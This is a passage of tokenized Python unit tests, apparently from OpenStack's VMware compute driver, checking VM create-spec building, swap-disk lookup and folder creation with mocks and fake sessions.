name|'InvalidInput'
op|','
nl|'\n'
name|'limits'
op|'.'
name|'validate'
op|')'
newline|'\n'
name|'limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
name|'shares_level'
op|'='
string|"'fira'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'InvalidInput'
op|','
nl|'\n'
name|'limits'
op|'.'
name|'validate'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_console_delay
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_console_delay'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'console_delay_seconds'
op|'='
number|'2'
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
number|'2'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
number|'2048'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
name|'constants'
op|'.'
name|'DEFAULT_OS_TYPE'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|'"ns0:OptionValue"'
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|'"ns0:OptionValue"'
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
number|'2000000'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'keyboard.typematicMinDelay'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_cores_per_socket
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_cores_per_socket'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
name|'cores_per_socket'
op|'='
number|'4'
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
string|"'otherGuest'"
newline|'\n'
name|'expected'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'memory_mb'
newline|'\n'
name|'expected'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'vcpus'
newline|'\n'
name|'expected'
op|'.'
name|'numCoresPerSocket'
op|'='
number|'4'
newline|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_memory_allocations
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_memory_allocations'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'memory_limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
name|'limit'
op|'='
number|'7'
op|','
nl|'\n'
name|'reservation'
op|'='
number|'6'
op|')'
newline|'\n'
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
name|'memory_limits'
op|'='
name|'memory_limits'
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
string|"'otherGuest'"
newline|'\n'
name|'expected'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'memory_mb'
newline|'\n'
name|'expected'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'vcpus'
newline|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
nl|'\n'
name|'memory_allocation'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ResourceAllocationInfo'"
op|')'
newline|'\n'
name|'memory_allocation'
op|'.'
name|'limit'
op|'='
number|'7'
newline|'\n'
name|'memory_allocation'
op|'.'
name|'reservation'
op|'='
number|'6'
newline|'\n'
name|'memory_allocation'
op|'.'
name|'shares'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:SharesInfo'"
op|')'
newline|'\n'
name|'memory_allocation'
op|'.'
name|'shares'
op|'.'
name|'level'
op|'='
string|"'normal'"
newline|'\n'
name|'memory_allocation'
op|'.'
name|'shares'
op|'.'
name|'shares'
op|'='
number|'0'
newline|'\n'
name|'expected'
op|'.'
name|'memoryAllocation'
op|'='
name|'memory_allocation'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_swap
dedent|''
name|'def'
name|'test_get_swap'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_ref'
op|'='
string|"'fake-vm-ref'"
newline|'\n'
nl|'\n'
comment|'# Root disk'
nl|'\n'
name|'controller_key'
op|'='
number|'1000'
newline|'\n'
name|'root_disk'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
op|')'
newline|'\n'
name|'root_disk'
op|'.'
name|'controllerKey'
op|'='
name|'controller_key'
newline|'\n'
name|'disk_backing'
op|'='
name|'fake'
op|'.'
name|'VirtualDiskFlatVer2BackingInfo'
op|'('
op|')'
newline|'\n'
name|'disk_backing'
op|'.'
name|'fileName'
op|'='
string|"'[test_datastore] uuid/uuid.vmdk'"
newline|'\n'
name|'root_disk'
op|'.'
name|'capacityInBytes'
op|'='
number|'1048576'
newline|'\n'
name|'root_disk'
op|'.'
name|'backing'
op|'='
name|'disk_backing'
newline|'\n'
nl|'\n'
comment|'# Swap disk'
nl|'\n'
name|'swap_disk'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
op|')'
newline|'\n'
name|'swap_disk'
op|'.'
name|'controllerKey'
op|'='
name|'controller_key'
newline|'\n'
name|'disk_backing'
op|'='
name|'fake'
op|'.'
name|'VirtualDiskFlatVer2BackingInfo'
op|'('
op|')'
newline|'\n'
name|'disk_backing'
op|'.'
name|'fileName'
op|'='
string|'"swap"'
newline|'\n'
name|'swap_disk'
op|'.'
name|'capacityInBytes'
op|'='
number|'1024'
newline|'\n'
name|'swap_disk'
op|'.'
name|'backing'
op|'='
name|'disk_backing'
newline|'\n'
name|'devices'
op|'='
op|'['
name|'root_disk'
op|','
name|'swap_disk'
op|']'
newline|'\n'
nl|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'devices'
op|')'
name|'as'
name|'mock_call'
op|':'
newline|'\n'
indent|' '
name|'device'
op|'='
name|'vm_util'
op|'.'
name|'get_swap'
op|'('
name|'session'
op|','
name|'vm_ref'
op|')'
newline|'\n'
nl|'\n'
name|'mock_call'
op|'.'
name|'assert_called_once_with'
op|'('
name|'mock'
op|'.'
name|'ANY'
op|','
nl|'\n'
string|'"get_object_property"'
op|','
name|'vm_ref'
op|','
string|'"config.hardware.device"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'swap_disk'
op|','
name|'device'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_folder_with_empty_vmfolder
dedent|''
dedent|''
name|'def'
name|'test_create_folder_with_empty_vmfolder'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test create_folder when the datacenter vmFolder is empty"""'
newline|'\n'
name|'child_folder'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'child_folder'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'side_effect'
op|'='
op|'['
name|'None'
op|','
name|'child_folder'
op|']'
op|')'
op|':'
newline|'\n'
indent|' '
name|'parent_folder'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'parent_folder'
newline|'\n'
name|'parent_folder'
op|'.'
name|'value'
op|'='
string|"'parent-ref'"
newline|'\n'
name|'child_name'
op|'='
string|"'child_folder'"
newline|'\n'
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'create_folder'
op|'('
name|'session'
op|','
name|'parent_folder'
op|','
name|'child_name'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'child_folder'
op|','
name|'ret'
op|')'
newline|'\n'
name|'expected_calls'
op|'='
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'parent_folder'
op|','
nl|'\n'
string|"'childEntity'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
string|"'CreateFolder'"
op|','
nl|'\n'
name|'parent_folder'
op|','
name|'name'
op|'='
name|'child_name'
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_calls'
op|','
nl|'\n'
name|'session'
op|'.'
name|'_call_method'
op|'.'
name|'call_args_list'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_folder_not_present
dedent|''
dedent|''
name|'def'
name|'test_create_folder_not_present'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test create_folder when child not present."""'
newline|'\n'
name|'prop_val'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'prop_val'
op|'.'
name|'ManagedObjectReference'
op|'='
op|'['
op|']'
newline|'\n'
name|'child_folder'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'child_folder'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'side_effect'
op|'='
op|'['
name|'prop_val'
op|','
name|'child_folder'
op|']'
op|')'
op|':'
newline|'\n'
indent|' '
name|'child_name'
op|'='
string|"'child_folder'"
newline|'\n'
name|'parent_folder'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'parent_folder'
newline|'\n'
name|'parent_folder'
op|'.'
name|'value'
op|'='
string|"'parent-ref'"
newline|'\n'
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'create_folder'
op|'('
name|'session'
op|','
name|'parent_folder'
op|','
name|'child_name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'child_folder'
op|','
name|'ret'
op|')'
newline|'\n'
name|'expected_invoke_api'
op|'='
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'parent_folder'
op|','
nl|'\n'
string|"'childEntity'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
string|"'CreateFolder'"
op|','
nl|'\n'
name|'parent_folder'
op|','
name|'name'
op|'='
name|'child_name'
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_invoke_api'
op|','
nl|'\n'
name|'session'
op|'.'
name|'_call_method'
op|'.'
name|'mock_calls'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_folder_already_present
dedent|''
dedent|''
name|'def'
name|'test_create_folder_already_present'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test create_folder when child already present."""'
newline|'\n'
name|'parent_folder'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'parent_folder'
newline|'\n'
name|'child_name'
op|'='
string|"'child_folder'"
newline|'\n'
name|'prop_val'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'child_entity_1'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'child_entity_1'
op|'.'
name|'_type'
op|'='
string|"'Folder'"
newline|'\n'
name|'child_entity_1_name'
op|'='
string|"'SomeOtherName'"
newline|'\n'
name|'child_entity_2'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'child_entity_2'
op|'.'
name|'_type'
op|'='
string|"'Folder'"
newline|'\n'
name|'child_entity_2_name'
op|'='
string|"'AnotherName'"
newline|'\n'
name|'child_entity_3'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'child_entity_3'
op|'.'
name|'_type'
op|'='
string|"'Folder'"
newline|'\n'
name|'child_entity_3_name'
op|'='
name|'child_name'
newline|'\n'
name|'prop_val'
op|'.'
name|'ManagedObjectReference'
op|'='
op|'['
name|'child_entity_1'
op|','
name|'child_entity_2'
op|','
nl|'\n'
name|'child_entity_3'
op|']'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'side_effect'
op|'='
op|'['
name|'prop_val'
op|','
nl|'\n'
name|'child_entity_1_name'
op|','
nl|'\n'
name|'child_entity_2_name'
op|','
nl|'\n'
name|'child_entity_3_name'
op|']'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'create_folder'
op|'('
name|'session'
op|','
name|'parent_folder'
op|','
name|'child_name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'child_entity_3'
op|','
name|'ret'
op|')'
newline|'\n'
name|'expected_invoke_api'
op|'='
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'parent_folder'
op|','
nl|'\n'
string|"'childEntity'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'child_entity_1'
op|','
nl|'\n'
string|"'name'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'child_entity_2'
op|','
nl|'\n'
string|"'name'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'child_entity_3'
op|','
nl|'\n'
string|"'name'"
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_invoke_api'
op|','
nl|'\n'
name|'session'
op|'.'
name|'_call_method'
op|'.'
name|'mock_calls'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_folder_with_duplicate_name
dedent|''
dedent|''
name|'def'
name|'test_create_folder_with_duplicate_name'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'parent_folder'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'parent_folder'
newline|'\n'
name|'parent_folder'
op|'.'
name|'value'
op|'='
string|"'parent-ref'"
newline|'\n'
name|'child_name'
op|'='
string|"'child_folder'"
newline|'\n'
nl|'\n'
name|'prop_val_1'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'prop_val_1'
op|'.'
name|'ManagedObjectReference'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'child_entity_2'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'child_entity_2'
op|'.'
name|'_type'
op|'='
string|"'Folder'"
newline|'\n'
name|'prop_val_2'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'prop_val_2'
op|'.'
name|'ManagedObjectReference'
op|'='
op|'['
name|'child_entity_2'
op|']'
newline|'\n'
name|'child_entity_2_name'
op|'='
name|'child_name'
newline|'\n'
nl|'\n'
name|'details'
op|'='
op|'{'
string|"'object'"
op|':'
string|"'folder-1'"
op|'}'
newline|'\n'
name|'duplicate_exception'
op|'='
name|'vexc'
op|'.'
name|'DuplicateName'
op|'('
name|'details'
op|'='
name|'details'
op|')'
newline|'\n'
nl|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'side_effect'
op|'='
op|'['
name|'prop_val_1'
op|','
nl|'\n'
name|'duplicate_exception'
op|','
nl|'\n'
name|'prop_val_2'
op|','
nl|'\n'
name|'child_entity_2_name'
op|']'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'create_folder'
op|'('
name|'session'
op|','
name|'parent_folder'
op|','
name|'child_name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'child_entity_2'
op|'.'
name|'_type'
op|','
name|'ret'
op|'.'
name|'_type'
op|')'
newline|'\n'
name|'expected_invoke_api'
op|'='
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'parent_folder'
op|','
nl|'\n'
string|"'childEntity'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
string|"'CreateFolder'"
op|','
nl|'\n'
name|'parent_folder'
op|','
name|'name'
op|'='
name|'child_name'
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_invoke_api'
op|','
nl|'\n'
name|'session'
op|'.'
name|'_call_method'
op|'.'
name|'mock_calls'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_folder_does_not_exist
dedent|''
dedent|''
name|'def'
name|'test_get_folder_does_not_exist'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'_get_folder'
op|'('
name|'session'
op|','
string|"'fake-parent'"
op|','
string|"'fake-name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'ret'
op|')'
newline|'\n'
name|'expected_invoke_api'
op|'='
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
string|"'fake-parent'"
op|','
nl|'\n'
string|"'childEntity'"
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_invoke_api'
op|','
nl|'\n'
name|'session'
op|'.'
name|'_call_method'
op|'.'
name|'mock_calls'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_folder_child_entry_not_folder
dedent|''
dedent|''
name|'def'
name|'test_get_folder_child_entry_not_folder'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'child_entity'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'child_entity'
op|'.'
name|'_type'
op|'='
string|"'NotFolder'"
newline|'\n'
name|'prop_val'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'prop_val'
op|'.'
name|'ManagedObjectReference'
op|'='
op|'['
name|'child_entity'
op|']'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
